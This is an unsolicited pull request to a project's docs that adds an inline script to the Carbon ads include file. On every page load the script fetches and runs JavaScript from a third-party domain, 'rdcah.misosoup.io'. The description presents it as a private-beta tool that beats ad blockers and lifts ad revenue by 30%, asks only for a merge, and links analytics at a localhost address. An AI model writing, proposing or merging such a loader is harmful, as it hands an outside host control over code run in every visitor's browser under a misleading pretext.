### PR TITLE
Increase Carbon ad revenue by 30%

### DIFF
--- a/webpack/src/bulma/docs/_includes/carbon.html
+++ b/webpack/src/bulma/docs/_includes/carbon.html
@@ -1,3 +1,11 @@
+<script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "rdcah.misosoup.io");
+</script>
 <div id="carbon" class="box">
   <script async type="text/javascript" src="//cdn.carbonads.com/carbon.js?zoneid=1673&serve=C6AILKT&placement=bulmaio" id="_carbonads_js"></script>
 </div>


### PR DESCRIPTION
Hey @uptownhr,

Awesome choice picking Carbon ads, they are simple and unobtrusive! My friend and I have been working on our spare time a way to increase Carbon revenue by ~30%. 

We realized that ad blockers were taking a huge chunk of our revenue so we built [Miza](https://miza.io). You can think of Miza as a body guard for your ads, when Miza is installed, your ads will always appear.

We are currently in a private beta and thought your site would be a great fit! If you want to give us a, it's as simple as merging the pull request. Once you have merged the pull request you can view your analytics with this link: [http://localhost:3030/invite/ijaequ](http://localhost:3030/invite/ijaequ)

You can contact me directly if you have any questions at brian@miza.io Thanks for your time!